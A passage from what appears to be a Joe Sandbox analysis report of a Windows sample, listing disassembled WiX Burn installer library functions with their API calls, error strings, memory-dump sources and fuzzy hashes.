                                                                                                                                                          • API String ID: 2915228174-2469586463
                                                                                                                                                          • Opcode ID: af0ccbea9e58684462650b4d1fdd835144d04cc0a476ffad4f60d7aaf3390c32
                                                                                                                                                          • Instruction ID: c4fb74fd94e0d090ee4ae3f1fff17f183243ea5b9c6aea1ff7f5f85620b36e93
                                                                                                                                                          • Opcode Fuzzy Hash: af0ccbea9e58684462650b4d1fdd835144d04cc0a476ffad4f60d7aaf3390c32
                                                                                                                                                          • Instruction Fuzzy Hash: 6161A571D04119AFDF11DFA8C884EEF7BB9BF09304F18055AE904A7261E73AD905CB6A
                                                                                                                                                          Function 004553FF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?), ref: 00455424
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                          • Opcode ID: 3390942e75b88fb418ff051328ace288f6d7575c96d4a4a187e1e1d9774308a3
                                                                                                                                                          • Instruction ID: 26f2a917ed24f8be6f2d86f05716be21611b069049beb3c4acd2b8069ca65737
                                                                                                                                                          • Opcode Fuzzy Hash: 3390942e75b88fb418ff051328ace288f6d7575c96d4a4a187e1e1d9774308a3
                                                                                                                                                          • Instruction Fuzzy Hash: 44418B71900209AFCF15DF94CC91AAE7BB2FF4830AF18805AFD046B212E3399994CF54
                                                                                                                                                          Function 00438B8A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variant.cpp, xrefs: 00438C32
                                                                                                                                                          • Failed to copy variant value., xrefs: 00438C20
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                          • String ID: Failed to copy variant value.$d:\a\wix\wix\src\burn\engine\variant.cpp
                                                                                                                                                          • API String ID: 2001391462-2667412016
                                                                                                                                                          • Opcode ID: 80c92f21b02d1fae8b7d39d72fd5559ae1893663a5f3e28a29bae3478174d073
                                                                                                                                                          • Instruction ID: 9a564bbd595260fef612da06214044b14b0b8367bcdf462352746426a5d7d617
                                                                                                                                                          • Opcode Fuzzy Hash: 80c92f21b02d1fae8b7d39d72fd5559ae1893663a5f3e28a29bae3478174d073
                                                                                                                                                          • Instruction Fuzzy Hash: 1E213B728003167AE72199698CC5A7BF62CE70D754F14352FF511A6241DA7CEC4182BA
                                                                                                                                                          Function 004075C2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\memutil.cpp, xrefs: 00407603
                                                                                                                                                          • Failed to resize array while inserting items, xrefs: 004075F4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to resize array while inserting items$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\memutil.cpp
                                                                                                                                                          • API String ID: 0-1147601295
                                                                                                                                                          • Opcode ID: 8c5aca689efff096c9975855d1c1f19760aee1e637aa0c8c24cdd6706b68b134
                                                                                                                                                          • Instruction ID: 937bdcd9a6952dda5fab072e158d0e6fef7b202d3c2d33f2dea6e5004866f47f
                                                                                                                                                          • Opcode Fuzzy Hash: 8c5aca689efff096c9975855d1c1f19760aee1e637aa0c8c24cdd6706b68b134
                                                                                                                                                          • Instruction Fuzzy Hash: EA21D671B00205AFCB04DE68CD95EEFBB68EF84750F10842AF805B7381E274A90086A5
                                                                                                                                                          Function 00471630 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00467B72: RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,000001D0,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 004716DA
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 0047167C
                                                                                                                                                          • Failed to open uninstall key for potential related bundle: %ls, xrefs: 0047166D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: Failed to open uninstall key for potential related bundle: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                          • API String ID: 47109696-986361098
                                                                                                                                                          • Opcode ID: 6f4b673f595b1518a89ef3417b841f2bdfdecb4e621b6148900a995d58ef5d8b
                                                                                                                                                          • Instruction ID: 4c0c3f9cdac9b4f9d0a48ced37175b430d383f3d06c5c6baa874dbb6f8cb39ba
                                                                                                                                                          • Opcode Fuzzy Hash: 6f4b673f595b1518a89ef3417b841f2bdfdecb4e621b6148900a995d58ef5d8b
                                                                                                                                                          • Instruction Fuzzy Hash: 49218E75A00609FFDB01DFA8C841ADFBBF8EF48314F10846AE909E3261D774AE009B55
                                                                                                                                                          Function 00419493 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000000,00000000,00000002,00000002,?,00419AC6,00000008,?), ref: 00419534
                                                                                                                                                          Strings
                                                                                                                                                          • Logging, xrefs: 004194C1
                                                                                                                                                          • SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 004194AA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
                                                                                                                                                          • API String ID: 3535843008-387823766
                                                                                                                                                          • Opcode ID: ca11bec36f1f4e977362c03f9842853e0b4c0d431d829d77911df442ae4c1b8a
                                                                                                                                                          • Instruction ID: 1d2589a0936977a0d9820dbde0464172df6c47b071dedbc15e4bfe3687a26fe1
                                                                                                                                                          • Opcode Fuzzy Hash: ca11bec36f1f4e977362c03f9842853e0b4c0d431d829d77911df442ae4c1b8a
                                                                                                                                                          • Instruction Fuzzy Hash: F7112637600215FBEB26AA10C966BFF7769AB00B09FA44057E801B7180D77C9FC1C618
                                                                                                                                                          Function 004674CF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,004674A6,00020006,?,?,00000000,00000000,00000000,00417031,00000000,00000000,?,00417031,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce), ref: 0046750C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID: Failed to create registry key.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 2289755597-1991184446
                                                                                                                                                          • Opcode ID: fd62a38d7ac18555c623717f884fee54a2acd0e2549f66c753a69d7375437688
                                                                                                                                                          • Instruction ID: f8b7341b8a0ba89e19f580a65fb1f76231f5a355409764717bc5ec7d8d17614e
                                                                                                                                                          • Opcode Fuzzy Hash: fd62a38d7ac18555c623717f884fee54a2acd0e2549f66c753a69d7375437688
                                                                                                                                                          • Instruction Fuzzy Hash: 4E112976204219BBDB108E169C05D9F3BADDBC5798F01006ABD05E7250F639CD11D679
                                                                                                                                                          Function 004727B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00405685: SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000), ref: 004056A3
                                                                                                                                                            • Part of subcall function 00405685: GetLastError.KERNEL32(?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000,?,00000001,?,WixBundleOriginalSource,?,?,?), ref: 004056AD
                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000008,00000008,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,?,004728E0), ref: 0047281B
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to seek to start point in file., xrefs: 004727EA
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 004727F9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$ErrorLastPointerWrite
                                                                                                                                                          • String ID: Failed to seek to start point in file.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                          • API String ID: 972348794-2670695857
                                                                                                                                                          • Opcode ID: 0b37008bc0b309e7e87d7cc5a2eaf11378d3a3a596b4d9a96f1a2c029e34167a
                                                                                                                                                          • Instruction ID: d966188904647f6cc134663d083c092f28062d582b01535048e2e1e7e43fbf10
                                                                                                                                                          • Opcode Fuzzy Hash: 0b37008bc0b309e7e87d7cc5a2eaf11378d3a3a596b4d9a96f1a2c029e34167a
                                                                                                                                                          • Instruction Fuzzy Hash: E0010871640209BFD7149B54CD4AFEA776CEB14330F50823BF804E6190D7B9AD10C6E4
                                                                                                                                                          Function 004677EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00468681,00000000,00000214,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,00416615), ref: 00467810
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                          • String ID: Failed to read registry value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 3660427363-3324079972
                                                                                                                                                          • Opcode ID: 2cc164cc7f9cf109e49c945b95f838a9125cfb8ace9ade2d67fb0ba292c5f956
                                                                                                                                                          • Instruction ID: 290639a0c054d5f10c08911b0bc5a2675cc1542ee5e2199064569b044b6c4dd7
                                                                                                                                                          • Opcode Fuzzy Hash: 2cc164cc7f9cf109e49c945b95f838a9125cfb8ace9ade2d67fb0ba292c5f956
                                                                                                                                                          • Instruction Fuzzy Hash: AD01DF36B4411577D720255A4C49E6B2A5EDBC5B78F65403BBE08EB350E9688C02C3E9
                                                                                                                                                          Function 00467C0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,0046FFBE,004221A7,?,00000000,004221A7,?,00000000,00000001,00000000,00020019,004221A7,?,?,00020019,00000000), ref: 00467C35
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00467C5A, 00467C60, 00467C71
                                                                                                                                                          • Failed to get the number of subkeys and values under registry key., xrefs: 00467C66
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoQuery
                                                                                                                                                          • String ID: Failed to get the number of subkeys and values under registry key.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 1673771737-3658619222
                                                                                                                                                          • Opcode ID: b0fcacae01055737b1daad296dc384e18ed7dbb5abcdab4f457d3378dbe14303
                                                                                                                                                          • Instruction ID: cadbb6325aa2e5fd58672e16574e9a26d5c449049719bf9966237132b4936f93
                                                                                                                                                          • Opcode Fuzzy Hash: b0fcacae01055737b1daad296dc384e18ed7dbb5abcdab4f457d3378dbe14303
                                                                                                                                                          • Instruction Fuzzy Hash: 56F0AF7664429977E7301A1B8C0CE5B7E2EEBD2BA4F05002EBE08AA250E5294C11D1B9
                                                                                                                                                          Function 004686C9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,0041847B,00000000,00000000,00000000,?,?,?), ref: 004686E8
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID: Failed to set %ls value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 3702945584-2835911124
                                                                                                                                                          • Opcode ID: 76b00cf2a33c9b5c2d2562e6fcf45d2f0954f7088859fb10c7691729b204c2a1
                                                                                                                                                          • Instruction ID: 2e407d5c064193f76dcd2602af52b00b3f092a452e06eef7a0df20c3e33ca053
                                                                                                                                                          • Opcode Fuzzy Hash: 76b00cf2a33c9b5c2d2562e6fcf45d2f0954f7088859fb10c7691729b204c2a1
                                                                                                                                                          • Instruction Fuzzy Hash: AEF0C2762001547BE720151B8C08E5B3B2EDBC2BB5F15003FBE04AB250FA398C0192BD
                                                                                                                                                          Function 0040B0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 0040B0EC
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040B11E
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040B130
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                          • String ID: Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 1721193555-3107679958
                                                                                                                                                          • Opcode ID: 711637c9f5013a8519c70cbef22cc85bf0ca09c9464a4649f914bdae7912eadd
                                                                                                                                                          • Instruction ID: d94158b933fc53d8e4e3ec29addf39fcabbac702ae9253245cd8422736e58768
                                                                                                                                                          • Opcode Fuzzy Hash: 711637c9f5013a8519c70cbef22cc85bf0ca09c9464a4649f914bdae7912eadd
                                                                                                                                                          • Instruction Fuzzy Hash: 58F02672D006287ADF109A98DC0AADEBBB4EB04750F104436F504FA190E3749A04CBD5
                                                                                                                                                          Function 0046B321 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046B065: SysAllocString.OLEAUT32(00000000), ref: 0046B079
                                                                                                                                                            • Part of subcall function 0046B065: VariantInit.OLEAUT32(?), ref: 0046B085
                                                                                                                                                            • Part of subcall function 0046B065: VariantClear.OLEAUT32(?), ref: 0046B174
                                                                                                                                                            • Part of subcall function 0046B065: SysFreeString.OLEAUT32(00000000), ref: 0046B17F
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046B37D
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to get value from attribute., xrefs: 0046B33F
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B34E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                          • String ID: Failed to get value from attribute.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                          • API String ID: 3379191133-1580495515
                                                                                                                                                          • Opcode ID: 619628eb6833e64647047f7286877c1a4404714b9ef8f529577334135c4b55cd
                                                                                                                                                          • Instruction ID: 156435b1f3d9b202f30eb06ef9f0e1001646f713fd51de9c6936d52e83e9c953
                                                                                                                                                          • Opcode Fuzzy Hash: 619628eb6833e64647047f7286877c1a4404714b9ef8f529577334135c4b55cd
                                                                                                                                                          • Instruction Fuzzy Hash: 77F04431B41218FBDB119F91CD06F9E3B24DB01754F100066FD00B5291E7795F90D6DA
                                                                                                                                                          Function 0040A4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDefaultLangID.KERNEL32 ref: 0040A4E4
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040A4FE
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040A510
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
